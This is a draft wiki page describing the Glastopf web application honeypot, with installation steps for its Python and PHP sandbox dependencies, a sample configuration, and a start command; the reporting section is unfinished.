Glastopf

From aldeid
Jump to navigation Jump to search
DRAFT
This page is still a draft. Thank you for your understanding.

Description

Glastopf is a low-interaction web application honeypot capable of emulating thousands of vulnerabilities to gather data from attacks that target web applications. The principle behind it is very simple: reply to the attack using the response the attacker is expecting from his attempt to exploit the web application.

+--------------------------+
|        Attack event      |
+-------------+------------+
              |
              V
+--------------------------+
|  Vulnerability emulator  |
+-------------+------------+
              |
              V
+--------------------------+
|      Collect data        |
+-------------+------------+
              |
      +-------+-----+
      |             |
      V             V
+----------+ +-------------+
| Database | | store files |
+-----+----+ +------+------+
      |             |
      +-------+-----+
              |
              V
+--------------------------+
|     Reply to attacker    |
+--------=-----------------+

For more information, I would recommend that you refer to the excellent technical paper here: http://honeynet.org/files/KYT-Glastopf-Final_v1.pdf.

Installation

Prerequisites

Packages

$ sudo apt-get install git subversion python2.7 python-openssl python2.7-dev \
   build-essential make

To run the PHP sandbox, you will also need these packages:

$ sudo apt-get install php5-cli php5-dev php5-cgi subversion

evnet module

First you need to install the libev dependency:

$ wget http://dist.schmorp.de/libev/libev-4.18.tar.gz
$ tar xzf libev-4.18.tar.gz
$ cd libev-4.18/
$ ./configure
$ make
$ sudo make install

You should now be able to install evnet:

$ git clone git://github.com/rep/evnet.git
$ sudo python2.7 setup.py install

pyev

$ cd ~/src/
$ svn checkout http://pyev.googlecode.com/svn/trunk/ pyev
$ cd pyev/pyev/
$ sudo python2.7 setup.py install

Installation the PHP sandbox

$ cd ~/src/
$ svn co http://svn.php.net/repository/pecl/apd/trunk apd
$ cd apd/
$ phpize
$ ./configure
$ make
$ sudo make install

At the end of your php.ini file (/etc/php5/cli/php.ini), add these lines:

zend_extension = /usr/lib/php5/20090626+lfs/apd.so
apd.dumpdir = /tmp/apd
apd.statement_tracing = 0

Test that the extension is included by issuing following command:

$ php5-cgi --version
PHP 5.3.6-13ubuntu3.6 with Suhosin-Patch (cgi-fcgi) (built: Feb 11 2012 02:08:18)
Copyright (c) 1997-2011 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2011 Zend Technologies
    with Advanced PHP Debugger (APD) v1.0.2-dev, , by George Schlossnagle

Install Glatopf and apd_sandbox.php

Now it's time to create the apd_sandbox.php. To do that we will download Glastopf:

$ cd /opt/
$ sudo svn co svn://glastopf.org:9090/glaspot glaspot
$ cd glaspot/trunk/sandbox/
$ sudo make

Configuration

The minimal configuration is to set up the IP and port used by Glastopf. Open the configuration file:

$ sudo vim /opt/glaspot/trunk/glastopf.cfg

And adapt depending on your environment:

[webserver]
host = 88.191.123.456
port = 80

[hpfeed]
enabled = False
host = 
port = 10000
secret = 
# channels comma separated
chan = glastopf.events,glastopf.files
ident =

Usage

Start and test the honeypot

Now that everything is configured, it's time to start and test our honeypot. Start it by issuing following commands:

$ cd /opt/glaspot/trunk/
$ sudo python webserver.py

Reporting

INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.